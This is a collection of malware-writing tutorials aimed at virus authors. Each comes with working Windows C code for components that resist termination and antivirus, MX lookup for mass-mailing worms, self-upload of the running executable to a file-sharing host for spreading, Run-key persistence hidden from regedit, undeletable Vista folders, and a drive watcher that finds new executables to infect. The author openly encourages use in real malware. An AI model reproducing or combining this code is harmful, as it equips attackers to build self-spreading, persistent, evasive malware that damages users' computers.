Table of contents: - advapi32: for more than registry editing? - a simple MX lookup for your next mass mailer - a new spreading platform - "hide" your registry entries - undeletables in windows vista - ReadDirectoryChangesW: easily find new target files advapi32: for more than registry editing? hello kiddies - here's an idea for your next win32 malware : advapi32's SetKernelObjectSecurity(). sounds interesting, doesn't it? well friends, it is. according to msdn, the api "sets the security of a kernel object [*]" which seems rather obvious based on its name. but what this means for you and i is, we can prevent our process from being terminated via micro$oft's task manager or a call to TerminateProcessA() from an antivirus program [**]. unfortunately, this api will only work on win2k and above, but then again, it is 2009 and win2k died nearly a decade ago [***]. below is a simple example of using this api in c [****]. - - - [ code ] - #define WIN32_LEAN_AND_MEAN #include /* define the ConvertStringSec... api */ typedef BOOL (WINAPI *CSSDTSD) (LPCTSTR szWhatever, DWORD dwWhatever, PSECURITY_DESCRIPTOR *pWhatever, PULONG plWhatever); /* define the SetKernelObjectSecurity() api */ typedef BOOL (WINAPI *SKOS) (HANDLE hWhatever, SECURITY_INFORMATION pWhatver, PSECURITY_DESCRIPTOR pWhatever2); /* define our procedures */ BOOL init_protect(void); BOOL protectMe(void); /* these variables will be pointers to the apis */ CSSDTSD _ConvertStringSecurityDescriptorToSecurityDescriptor; SKOS _SetKernelObjectSecurity; /* entry point */ int main(void){ HWND hWND; /* hide the console window */ AllocConsole(); hWND = FindWindowA("ConsoleWindowClass", 0); ShowWindow(hWND, 0); /* try to load apis from advapi32 */ if(init_protect() == 0) return 1234; /* try to protect our program */ if(protectMe() == 0) return 6789; /* write obnoxious in console */ printf("[can't close me]\n\tkefi / 1.3.3175"); /* sleep forever */ while(1) Sleep(1); } BOOL protectMe(void){ HANDLE hProcess; SECURITY_ATTRIBUTES pSecurityAttribs; int ret = 0; /* get our PID with PROCESS_ALL_ACCESS */ hProcess = OpenProcess(0x1f0fff, 0, GetCurrentProcessId()); /* setup SECURITY_ATTRIBUTES structure */ pSecurityAttribs.nLength = 12; //sizeof(SECURITY_ATTRIBUTES); pSecurityAttribs.bInheritHandle = 0; /* call ConvertStringSec... and be sure it worked */ /* note: parameter 2 = SDDL_REVISION_1 */ ret = _ConvertStringSecurityDescriptorToSecurityDescriptor("D:P", 1, &pSecurityAttribs.lpSecurityDescriptor, 0); if(ret == 0) return 0; /* call SetKernelObjectSecurity() and be sure it worked */ ret = _SetKernelObjectSecurity(hProcess, DACL_SECURITY_INFORMATION, pSecurityAttribs.lpSecurityDescriptor); if(ret == 0) return 0; /* return true */ return 1; } BOOL init_protect(void){ HANDLE hAdvAPI; /* find location of advapi32.dll */ /* note: thanks bumblebee for optimization trick */ hAdvAPI = GetModuleHandle("advapi32"); if(hAdvAPI == 0){ hAdvAPI = LoadLibrary("advapi32"); if(hAdvAPI == 0) return 0; } /* find location of apis via GetProcAddress() */ _ConvertStringSecurityDescriptorToSecurityDescriptor = (CSSDTSD) GetProcAddress(hAdvAPI, "ConvertStringSecurityDescriptorToSecurityDescriptorA"); _SetKernelObjectSecurity = (SKOS) GetProcAddress(hAdvAPI, "SetKernelObjectSecurity"); if((_ConvertStringSecurityDescriptorToSecurityDescriptor == 0) || (_SetKernelObjectSecurity == 0)) return 0; /* return true */ return 1; } - [ code ] – - - and lastly my friends, i hope to see this used somewhere in the future. kthxbi xD (k) boomtime, the first day of confusion, 3175 [ kefi twenty three at gmail dot com ] [*] [**] this depends on the privileges of the aforementioned program [***] i have only tested this on windows vista sp1 [****] compiled with dev-c++ random [out of context] things you need to do: download the ahleuchatistas' "on the culture industry" album; plant and eat some echinopsis pachanoi; if you're american, eat less fake food. *** a simple MX lookup for your next mass mailer hello kids, i can't help but notice that most of the mass mailing worms coming from this "scene" don't actually perform a DNS lookup to acquire a SMTP server. this is silly; stop it now. your capabilities for spreading are extremely limited by doing any of the following: assuming that outlook is used and taking its smtp server registry entry; appending "smtp." or "mx." to a domain; having a pre-compiled list of SMTP servers; or whatever you kiddies are doing now... now i understand writing your own function to perform a DNS lookup is tedious and requires hundreds of lines of code. for this reason, microsoft wrote an api for you! in "dnsapi.dll" there lives a procedure called "DnsLookup_A" and it does exactly what it sounds like: performs a DNS lookup! this example was compiled with dev-c at ~300kb. - - - [ code ] - #include #include // we need this API typedef int (WINAPI *DNSQUERYA)(PCSTR, WORD, DWORD, PIP4_ARRAY, PDNS_RECORD *, PVOID *); DNSQUERYA _DnsQueryA; // our procedures BOOL init_dns(void); BOOL MXLookup(char *, char *); int main(void){ if(init_dns() == FALSE){ printf("exiting: could not locate APIs..."); return 0; } char szDomain[] = ""; char *szSMTP; szSMTP = (char *) malloc(64); // malloc some space memset(szSMTP, 0, 64); if(MXLookup(szDomain, szSMTP) == TRUE){ // perform lookup printf("prefered SMTP server for '%s' is '%s'", szDomain, szSMTP); return 1; } return 0; } BOOL init_dns(void){ HINSTANCE hDNS; // find dnsapi in memory hDNS = GetModuleHandle("dnsapi"); if(hDNS == 0){ hDNS = LoadLibrary("dnsapi"); if(hDNS == 0) return FALSE; } // find DnsQuery_A in memory _DnsQueryA = (DNSQUERYA) GetProcAddress(hDNS, "DnsQuery_A"); if(_DnsQueryA == 0) return FALSE; return TRUE; } BOOL MXLookup(char *szDomain, char *buffer){ int preference = 9001; // OVER 9000 int ret = 0; /* * normally i would type this structure out myself... but i'm lazy and * it's huge: */ DNS_RECORD *pQueryResults; DNS_RECORD *pQueryRec; // make query ret = _DnsQueryA(szDomain, DNS_TYPE_MX, DNS_QUERY_STANDARD, 0, &pQueryResults, 0); if(ret != ERROR_SUCCESS) return FALSE; // sort through results to find lowest preference for(pQueryRec = pQueryResults; pQueryRec; pQueryRec = pQueryRec->pNext){ if(pQueryRec->wType != DNS_TYPE_MX) continue; if(pQueryRec->Data.MX.wPreference < preference){ preference = pQueryRec->Data.MX.wPreference; strcpy(buffer, pQueryRec->Data.MX.pNameExchange); } } if(!buffer) return FALSE; return TRUE; } - [ code ] - - - that's it. hopefully you'll decide to use the 70 lines rather than performing one of the aforementioned shitty ways to locate an SMTP server. you may use, abuse and edit this code any way you see fit. just don't blame me when you end up in prison. (k) kefi, 64th of bureaucracy, 3175 contact me (or not) www - email - *** a new spreading platform spreading worms is becoming more and more difficult. email servers have advanced their technologies to avoid mass-mailers; people do not open suspicious email attachments; most P2P users use torrents rather than downloading single files; even IRC users know not to accept DCC files from people they do not know/trust. so what's next? i've seen both DR-EF and DiA use HTTP servers on the infected computers to spread, but this method doesn't work either. unfort- unately, you cannot bind a port in windows vista without user interaction; and users see a URL they're not familiar with and get worried... so this method is dead. in this tutorial, i'll show you how to take the next step forward and have users downloading from a site they know and trust. awhile back, i was hired to write software to pragmatically upload files to at the time, i did not think anything of it. a few days past and i realized that this would be a fantastic platform for worms to spread. by editing a few of my functions, i was able to convert my code into malware-friendly format. my purpose for this tutorial is not to teach you how to write code in c or explain sockets. i will not be commenting on every line of code. knowledge of c and windows sockets are a requirement for this tutorial... sorry kids. ----------------------------------------------------------------------- // main.c ----------------------------------------------------------------------- #include #include #include #include "header.h" int main(void){ char *szFileURL; char *szFilename; DeleteFile("logfile.txt"); szFilename = (char *) malloc(256); memset(szFilename, 0, 256); GetModuleFileName(0, szFilename, 256); szFileURL = (char *) malloc(128); memset(szFileURL, 0, 128); if(rsUploadFile(szFilename, "test.exe", szFileURL) == FALSE){ logLine("could not upload file!"); return 0; } else { logLine("upload successful\r\n\turl: %s", szFileURL); return 0; } } ----------------------------------------------------------------------- // rapidshare.c ----------------------------------------------------------------------- /* * rsUploadFile() * szFilename -> file to be uploaded (ie - c:\windows\virus.exe) * szUploadName -> name to be uploaded as (ie - virus.exe) * szFileURL -> buffer to accept uploaded file path * 128 bytes is plenty ( * * -> handles information from rsGetUploadServer() and rsCreateHeader() * -> sends headers and requests to * -> reads file stored at szFilename and sends 1024 bytes at a time to the * server returned from rsGetUploadServer * -> parses data returned from * * returns TRUE on success * FALSE on failure */ BOOL rsUploadFile(char *szFilename, char *szUploadName, char *szFileURL){ HANDLE hFile; int nFileSize = 0; hFile = CreateFile(szFilename, GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0); if(hFile == INVALID_HANDLE_VALUE){ logLine("could not open '%s'!", szFilename); return FALSE; } nFileSize = GetFileSize(hFile, 0); if(nFileSize < 1024){ logLine("unrealistic or invalid file size: %d", nFileSize); return FALSE; } logLine("file size: %d", nFileSize); char *szServer; char *szHeader; wsaInitiated = initWSA(); // create buffer to hold upload server szServer = (char *) malloc(28); memset(szServer, 0, 28); // get upload server if(rsGetUploadServer(szServer) == FALSE){ logLine("could not find valid upload server!"); return FALSE; } logLine("found valid server... creating header"); // create buffer to hold header szHeader = (char *) malloc(640); memset(szHeader, 0, 640); // create header rsCreateHeader(szUploadName, nFileSize, szHeader); logLine("created header... attempting connection"); struct hostent *pHostEnt; pHostEnt = gethostbyname(szServer); if(!pHostEnt){ logLine("gethostbyname() error: %d", WSAGetLastError()); return FALSE; } SOCKET sock; // create socket sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if(sock == INVALID_SOCKET){ logLine("socket() error: %d", WSAGetLastError()); return FALSE; } SOCKADDR_IN pSockAddr; // configure socket pSockAddr.sin_family = AF_INET; pSockAddr.sin_port = htons(80); pSockAddr.sin_addr.S_un.S_addr = *((unsigned long *) pHostEnt->h_addr_list[0]); int ret = 0; // attempt to connect to server ret = connect(sock, (struct sockaddr *) &pSockAddr, sizeof(struct sockaddr)); if(ret != 0){ logLine("connect() error: %d", WSAGetLastError()); closesocket(sock); return FALSE; } logLine("\r\nconnected to %s\r\n", szServer); // send header transfer(szHeader); free(szHeader); char *buffer; int x = 0; int i = 0; // create buffer for file contents buffer = (char *) malloc(1024); memset(buffer, 0, 1024); SetFilePointer(hFile, 0, 0, FILE_BEGIN); while(1){ i = 0; // read 1024 bytes from file ret = ReadFile(hFile, buffer, 1024, &i, 0); if(ret == 0) // error checking break; if(i == 0) // error checking break; // send 1024 (or whatever's left) to server ret = send(sock, buffer, i, 0); // add bytes read to offset in file x += i; logLine("sent %d of %d bytes", x, nFileSize); } CloseHandle(hFile); // error checking if(x != nFileSize){ logLine("send error: %d [%d != %d]!", WSAGetLastError(), x, nFileSize); closesocket(sock); return FALSE; } logLine("sent all %d bytes!", x); char *szHeaderTail; // oxymoron? lawlzzzzz // create buffer for the end of the header szHeaderTail = (char *) malloc(128); memset(szHeaderTail, 0, 128); sprintf(szHeaderTail, "\r\n%s--\r\n", szBoundary); // send end of header transfer(szHeaderTail); free(szHeaderTail); logLine("sent entire packet... fetching results"); // restore buffer to recv data memset(buffer, 0, 1024); // try to recv 1023 bytes from server ret = recv(sock, buffer, 1023, 0); if(ret != 0){ // success logLine(buffer); closesocket(sock); } else { // failure logLine("recv error: %d", WSAGetLastError()); closesocket(sock); return FALSE; } // parse data from recv buffer x = ret; while(buffer[x] != '?') // search for "?" x--; x--; // we want the byte before "?" i = x; while(buffer[i] != '=') // search for "=" i--; i++; // we want the byte after "=" int a = 0; int b = 0; for(a = i; a <= x; a++) // start at byte after "=" and end at byte before "?" szFileURL[b++] = buffer[a]; szFileURL[b++] = 0; // end of string = char(0) if(szFileURL) // error checking return TRUE; else return FALSE; } /* * rsGetUploadServer() * szBuffer -> buffer to accept upload server * 28 bytes is plenty ( * * querys for the next avalible (preffered) server to upload files to * * returns TRUE on success * FALSE on failure */ BOOL rsGetUploadServer(char *szBuffer){ SOCKET sock; struct hostent *pHostEnt; int ret = 0; char *buf; char *buf2; // make sure WSAStartup() has been called and succeded if(wsaInitiated == FALSE){ wsaInitiated = initWSA(); if(wsaInitiated == FALSE){ logLine("WSAStartup() error: %d", WSAGetLastError()); return FALSE; } } pHostEnt = gethostbyname(""); if(!pHostEnt){ logLine("gethostname() error: %d", WSAGetLastError()); return FALSE; } SOCKADDR_IN pSockAddr; // create socked and error check sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if(sock == INVALID_SOCKET){ logLine("socket() error: %d", WSAGetLastError()); return FALSE; } // configure socket pSockAddr.sin_family = AF_INET; pSockAddr.sin_port = htons(80); pSockAddr.sin_addr.S_un.S_addr = *((unsigned long *)pHostEnt->h_addr_list[0]); // attempt to connect to if(connect(sock, (struct sockaddr *)&pSockAddr, sizeof(struct sockaddr)) != 0){ logLine("connect() error: %d", WSAGetLastError()); closesocket(sock); return FALSE; } logLine("connected to getting prefered server information."); // request next upload server transfer("GET /cgi-bin/rsapi.cgi?sub=nextuploadserver_v1 HTTP/1.0\r\n\r\n"); // create buffer to recv data buf = (char *) malloc(512); memset(buf, 0, 512); // recv 511 bytes from rapidshare ret = recv(sock, buf, 511, 0); buf2 = (char *) malloc(56); // the next lines parse data for server int a = ret; int b = 0; int c = 0; while(buf[a] != '\n') // search for new line a--; a++; // we want byte after new line for(b = a; b <= ret; b++) buf2[c++] = buf[b]; // add to buffer buf2[c++] = 0; // end of string = char(0) sprintf(szBuffer, "", buf2); // logLine("upload server: %s", szBuffer); free(buf); // some memory cleanup free(buf2); closesocket(sock); // close socket return TRUE; } /* * rsCreateHeader() * szFilename -> file to be uploaded (ie - virus.exe) * nFileSize -> length of file to be uploaded * szBuffer -> buffer to accept header * should be at least 512 bytes * * -> creates the HTTP POST header for uploading files to * */ void rsCreateHeader(char *szFilename, int nFileSize, char *szBuffer){ char *temp; char szContentHeader[384]; int nContentBytes = 0; temp = (char *) malloc(256); sprintf(temp, "%s\r\nContent-Disposition: form-data; name=\"rsapi_v1\"\r\n\r\n1\r\n", szBoundary); strcpy(szContentHeader, temp); memset(temp, 0, 256); sprintf(temp, "%s\r\nContent-Disposition: form-data; name=\"filecontent\"; filename=\"%s\"\r\n\r\n", szBoundary, szFilename); strcat(szContentHeader, temp); nContentBytes = strlen(szContentHeader); nContentBytes += strlen(szBoundary); nContentBytes += strlen("\r\n--\r\n"); nContentBytes += nFileSize; temp = (char *) malloc(640); memset(temp, 0, 640); sprintf(temp, "POST /cgi-bin/upload.cgi HTTP/1.0\r\nContent-Type: multipart/form-data; boundary=%s;\r\nContent-Length: %d\r\n\r\n%s", szBoundary, nContentBytes, szContentHeader); strcpy(szBuffer, temp); free(temp); } ----------------------------------------------------------------------- // misc.c ----------------------------------------------------------------------- BOOL initWSA(void){ WSADATA pWSAData; if(WSAStartup(0x0101, &pWSAData) != 0) if(WSAStartup(0x0202, &pWSAData) != 0) return FALSE; return TRUE; } void logLine(char *szLine, ...){ va_list pVA; // variable arguments are cool :) va_start(pVA, szLine); char *buffer = malloc(0xffff); FILE *fp = fopen("logfile.txt", "ab"); if((!buffer) || (!fp)){ va_end(pVA); } vsprintf(buffer, szLine, pVA); fprintf(fp, "%s\r\n", buffer); free(buffer); fclose(fp); } ----------------------------------------------------------------------- // header.h ----------------------------------------------------------------------- // this saves your fingers... #define transfer(szData) { send(sock, szData, strlen(szData), 0); logLine("%s", szData); } // misc functions BOOL initWSA(void); void logLine(char *, ...); // rapidshare functions BOOL rsUoloadFile(char *, char *, char *); BOOL rsGetUploadServer(char *); void rsCreateHeader(char *, int, char *); // rapidshare boundary char szBoundary[] = "----------------286B29206B65666920323030390A"; // hex :) BOOL wsaInitiated = FALSE; #include "rapidshare.c" #include "misc.c" ----------------------------------------------------------------------- and that's it. only a few hundred lines of code (:p). you may use, abuse and edit this code any way you see fit. just don't blame me when you end up in prison. (k) kefi, 46th day of Bureaucracy, YOLD 3175 contact me (or not) www - email - | fnord? *** "hide" your registry entries i've heard of this idea being done before, but don't ever remember seeing it. anyway, here it is: how to "hide" your entries in the registry. all we're doing here is creating a thread to watch for regedit.exe to be running. once regedit is opened, we overwrite our key with something that looks legit. when regedit closes, we re-write our key and repeat. the code below is somewhat optimized and only requires to be linked with kernel32.dll. i compiled with gcc and my .c (4.9 kb) file is larger than the .exe (4.5) without compression. - - [ code ] - - - - #define WIN32_LEAN_AND_MEAN #include // save your fingers #define voidW void WINAPI #define uLong unsigned long // PROCESSENTRY32 typedef struct _PE32 { DWORD dwSize; DWORD cntUsage; DWORD th32ProcessID; uLong th32DefaultHeapID; DWORD th32ModuleID; DWORD cntThreads; DWORD th32ParentProcessID; LONG pcPriClassBase; DWORD dwFlags; TCHAR szExeFile[MAX_PATH]; }PE32, *LPPE32; // we'll need this apis typedef BOOL (WINAPI *PF) (DWORD, LPPE32); typedef BOOL (WINAPI *PN) (DWORD, LPPE32); typedef HANDLE (WINAPI *CTS) (DWORD, DWORD); CTS _CreateToolhelp32Snapshot; PF _Process32First; PN _Process32Next; // the procedures we'll be using HANDLE newThread(LPTHREAD_START_ROUTINE, LPVOID); voidW registryStealth(void); BOOL init_tlhelp(void); BOOL addToReg(HKEY, char *, char *, char *); int main(void){ int ret = 0; /* * first we need to initiate the apis * and make sure we were successful * */ if(init_tlhelp() == FALSE){ ExitProcess(0); } /* * add our program to the registry */ addToReg(HKEY_CURRENT_USER, "software\\microsoft\\windows\\currentversion\\run", "virus", "c:\\virus.exe"); /* * create a thread to check for regedit's presence */ newThread(®istryStealth, 0); while(1){ /* * your viral code here */ } } voidW registryStealth(void){ /* * declare our variables */ PE32 pProcessEntry; HANDLE hSnapshot; HANDLE hProcess; int ret = WAIT_TIMEOUT; // this is explained below pProcessEntry.dwSize = sizeof(PE32); while(1){ /* * create a snapshot of all running processes */ hSnapshot = _CreateToolhelp32Snapshot(2, 0); if((int) hSnapshot == -1) continue; /* * get first process out of snapshot */ if(_Process32First((uLong) hSnapshot, &pProcessEntry) == FALSE) continue; do { /* * compare process' name to "regedit.exe" * strcmp is stupid... FALSE == TRUE */ if(strcmp(pProcessEntry.szExeFile, "regedit.exe") == FALSE){ /* * overwrite our registry key */ addToReg(HKEY_CURRENT_USER, "software\\microsoft\\windows\\currentversion\\run", "virus", "kernel32.dll"); /* * get a handle to regedit.exe */ hProcess = OpenProcess(SYNCHRONIZE, 0, pProcessEntry.th32ProcessID); if(hProcess == 0) continue; /* * here we are waiting for regedit.exe to close * every 1000 ms, we check to see if the handle has closed * * ret was stored to WAIT_TIMEOUT in our declarations just as a simple optimization */ while(ret == WAIT_TIMEOUT){ ret = WaitForSingleObject(hProcess, 1000); } /* * add our key back to the registry */ addToReg(HKEY_CURRENT_USER, "software\\microsoft\\windows\\currentversion\\run", "virus", "c:\\virus.exe"); /* * close unneeded handles */ CloseHandle(hProcess); CloseHandle(hSnapshot); } } while(_Process32Next((uLong) hSnapshot, &pProcessEntry)); // get the next process from the snapshot /* * sleep for 5000 ms to save some cpu */ Sleep(5000); } } BOOL addToReg(HKEY hKEY, char *szRegKey, char *szKeyName, char *szKeyValue){ HKEY hKey; int ret = 0; /* * open registry key */ ret = RegOpenKeyEx(hKEY, szRegKey, 0, KEY_WRITE, &hKey); if(ret != ERROR_SUCCESS){ return FALSE; } /* * write value to key */ ret = RegSetValueEx(hKey, szKeyName, 0, 1, (char *) szKeyValue, strlen(szKeyValue)); if(ret != ERROR_SUCCESS){ return FALSE; } /* * close reg key */ RegCloseKey(hKey); return TRUE; } BOOL init_tlhelp(void){ HANDLE hKernel; char szKernel[] = "kernel32"; /* * get handle to kernel32.dll */ hKernel = GetModuleHandle(szKernel); if(hKernel == 0) hKernel = LoadLibrary(szKernel); /* * find apis inside kernel32.dll */ _CreateToolhelp32Snapshot = (CTS) GetProcAddress(hKernel, "CreateToolhelp32Snapshot"); _Process32First = (PF) GetProcAddress(hKernel, "Process32First"); _Process32Next = (PN) GetProcAddress(hKernel, "Process32Next"); if((_CreateToolhelp32Snapshot == 0) || (_Process32First == 0) || (_Process32Next == 0)) return FALSE; return TRUE; } /* * DR-EF saves fingers :) */ HANDLE newThread(LPTHREAD_START_ROUTINE thProcedure, LPVOID params){ DWORD dwThreadID; return CreateThread(0, 0, thProcedure, params, 0, &dwThreadID); } - - - - [ code ] - - do whatever you want with this shit (edit, rip, steal, etc.). just don't blame me when you go to prison. written on prickle-prickle, the 55th day of bureaucracy, 3175. *** undeletables in windows vista hello children, today i've got a new trick for you: undeletables in windows vista. this bug, like most, was found completely on accident. i was working on a completely unrelated project and had accidentally created a folder called "%curdir%\ \". after realizing my mistake, i went to delete said folder. vista wouldn't let me. rather than doing what it was told, i was prompted with: "Error 0x80070091: The directory is not empty". i sat and thought about this for awhile, then remembered SPTH's tutorial Undeleteable direction via Batch, VBS and JS[*]. SPTH taught us that directories with special characters in them cannot be deleted. this, of course, was patched for XP's SP2 and eventually became useless. we must now thank the ignorance of microsoft. they decided to rewrite the xp kernel to create vista. while doing so, they forgot to implement a patch that already existed. with all of that being said, here's some code: - - [ test.c ] - - #include int main(void){ LPSECURITY_ATTRIBUTES pAttr = {0}; char *szNewDir; char *szNewFile; szNewFile = (char *) malloc(256); memset(szNewFile, 0, 256); szNewDir = (char *) malloc(256); memset(szNewDir, 0, 256); GetCurrentDirectory(256, szNewDir); strncat(szNewDir, "\\ \\", 256); CreateDirectory(szNewDir, pAttr); strncpy(szNewFile, szNewDir, 256); strncat(szNewFile, "poc.exe", 256); CopyFile("poc.exe", szNewFile, 0); ShellExecute(0, 0, szNewFile, 0, 0, 0); return 0; } - - [ test.c ] - - during testing, i realized that ShellExecuteA must be used rather than CreateProcess(). CreateProcess fails and returns error code 998 (invalid access to memory location) when attempting to run "poc.exe". test.c was complied with dev-c at ~380kb. - - [ poc.asm ] - - include 'include\' start: invoke MessageBox, 0, 'Undeletables in Vista', 'POC by kefi', 32 invoke ExitProcess, 0 .end start - - [ poc.asm ] - - poc.asm was compiled with fasm at ~2kb. place both compiled files in the same directory and run test. after execution, go to "%curdur%\ \" and delete "poc.exe". hit F5. note that "poc.exe" exists again . . . (k) kefi: Sweetmorn, the 4th of The Aftermath, 3175 www - email - * [*] "Undeleteable direction via Batch, VBS and JS" by Second Part To Hell, 06.10.2002 *** ReadDirectoryChangesW: easily find new target files here's a fairly simple way to find new target files: kernel32's ReadDirectoryChangesW api. the api does exactly what it sounds like; it "retrieves information that describes the changes within the specified directory. [*]" we can use this to our advantage by watching all drives we have access to and waiting for a victim files (pe/whatever) to be created (and/or modified, deleted, renamed, etc). the sample code i have provided you with (written in c; compiled with dev-cpp) will check for every available drive every minute. it then checks to see if one of its 26 possible threads is already watching the drive. if none of the threads are watching the drive, a thread is created. once a thread is created, it continuously watches for any executable (.exe) files being created. it will ignore all files created in the recycling bin, since infecting "garbage" seems redundant. this code has been optimized for readability, not efficiency or size. it may still contain bugs, but is commented heavily and should be easily understood -- assuming you have prior knowledge to c and winapi programming. you are free to use, abuse, alter or whatever you'd like to this . . . just don’t get me in trouble! - - - [ code ] - #define WIN32_LEAN_AND_MEAN #include #define FNI FILE_NOTIFY_INFORMATION #define MAX_THREADS 26 // a-z #define SECOND 1000 // milliseconds #define MINUTE SECOND * 60 #define voidW void WINAPI // procedures we'll be needing void WINAPI watchDrive(DWORD); int findNewThread(void); HANDLE newThread(LPTHREAD_START_ROUTINE, LPVOID); // this structure allows us to pass multiple values to a thread typedef struct { char szDrive[8]; BOOL bActive; }PARAMS; PARAMS pParams[MAX_THREADS]; // create 26 seperate ptrs to this struct int main(void){ char *drive; DWORD dwDriveType = 0; int index = 0; BOOL bActiveDrive; SetErrorMode(1); // hide error messages [big thanks to izee] for(index = 0; index < MAX_THREADS; index++) pParams[index].bActive = FALSE; drive = (char *) malloc(8); memset(drive, 0, 8); strcpy(drive + 1, ":\\"); // drive = '_:\' where '_' will hold 'a' through 'z' while(1){ for(drive[0] = 97; drive[0] < 122; drive[0]++){ // for a-z bActiveDrive = FALSE; // we assume this drive is not being watched for(index = 0; index < MAX_THREADS; index++){ // loop through each thread if(drive[0] == pParams[index].szDrive[0]){ // if _ matches our current drive (_:\) bActiveDrive = TRUE; printf("drive %s already being watched!\n", drive); break; // exit loop (we got the info we needed) } } index = findNewThread(); // find free thread if(index == -1) // if no threads are free... break; // exit loop because we're already watching all possible drives if(bActiveDrive == FALSE){ // if there is not a free thread switch(GetDriveType(drive)){ // check drive type case 2: // if fixed, removable or remote case 3: case 4: strcpy(pParams[index].szDrive, drive); pParams[index].bActive = TRUE; // set thread's active flag newThread(&watchDrive, (DWORD *) index); /* create thread and point to pParams[] * with current index */ break; default: // wrong drive type? do nothing break; } } } Sleep(MINUTE); /* sleep for awhile (for testing, i used * a minute; i'd suggest at least 5 minutes * in the wild) */ } } voidW watchDrive(DWORD index){ char *buffer; char *szFilename; char *szFullFile; char *szExt; char *pExt; int i = 0; HANDLE hDir; FNI *pFNI; int errors = 0; printf("watching %s...\n", pParams[index].szDrive); // malloc some space for our buffers buffer = (char *) malloc(1024); szFilename = (char *) malloc(56); szFullFile = (char *) malloc(256); szExt = (char *) malloc(4); // set buffers to zero memset(buffer, 0, 1024); memset(szFilename, 0, 56); memset(szFullFile, 0, 256); memset(szExt, 0, 4); // open drive with file watch access hDir = CreateFile(pParams[index].szDrive, 1, 5, 0, 3, 0x2000000, 0); if(hDir == -1) ExitThread(0); // loop infinitely while(1){ // read changes i = ReadDirectoryChangesW(hDir, buffer, 1022, 1, 0x017, (DWORD *) &i, 0, 0); if(i == 0){ // error? errors++; if(errors > 5){ // if we've experianced more than 5 errors ... memset(pParams[index].szDrive, 0, 8); // delete thread's flags pParams[index].bActive = FALSE; ExitThread(0); // exit thread /* note: this error-checking is not fool proof. my * idea behind it was: if we experiance more than 5 * errors, the drive must not be accessable. however, * this is not all ways true. worst case senerio, we * exit and re-create a thread for this drive. */ } continue; } // create file notify info pointer out of buffer for(pFNI = (FNI *)buffer;;){ // file_notify_create = 1 if(pFNI->Action == 1){ // create readable string i = WideCharToMultiByte(0, 0, pFNI->FileName, pFNI->FileNameLength / 2, szFilename, 255, 0, 0); szFilename[i] = 0; CharLower(szFilename); // extract file extension pExt = szFilename + i - 3; strncpy(szExt, pExt, 3); // fullfile = drive + filename sprintf(szFullFile, "%s%s", pParams[index].szDrive, szFilename); // disregard file if created in recycling bin if(strstr(szFilename, "recycle")) continue; // check for exe extension if(!strcmp(szExt, "exe")){ printf("%s\n", szFullFile); /* your infection procedure here */ } } // check for next offset in file notify info structure if(!pFNI->NextEntryOffset) break; // create pointer to next offset pFNI = (FNI *) (((char *) pFNI) + pFNI->NextEntryOffset); } } } int findNewThread(void){ int i = 0; for(i = 0; i < MAX_THREADS; i++){ /* loop through all threads * to find a non-active thread */ if(pParams[i].bActive == FALSE) return i; } return -1; } // procedure idea ripped from dr-ef's ircworm (saves your fingers!) HANDLE newThread(LPTHREAD_START_ROUTINE procedure, LPVOID lpParams){ DWORD dwThreadID; return CreateThread(0, 0, procedure, lpParams, 0, &dwThreadID); } - [ code ] – - - simple enough, huh? perhaps i'll see this method used in a future file infector . . . perhaps not. either way, i hope you've enjoyed this little article. idea: 67.3.3175 today: 30.4.3175 [*] [**] very special thanks to izee for beta-reading :)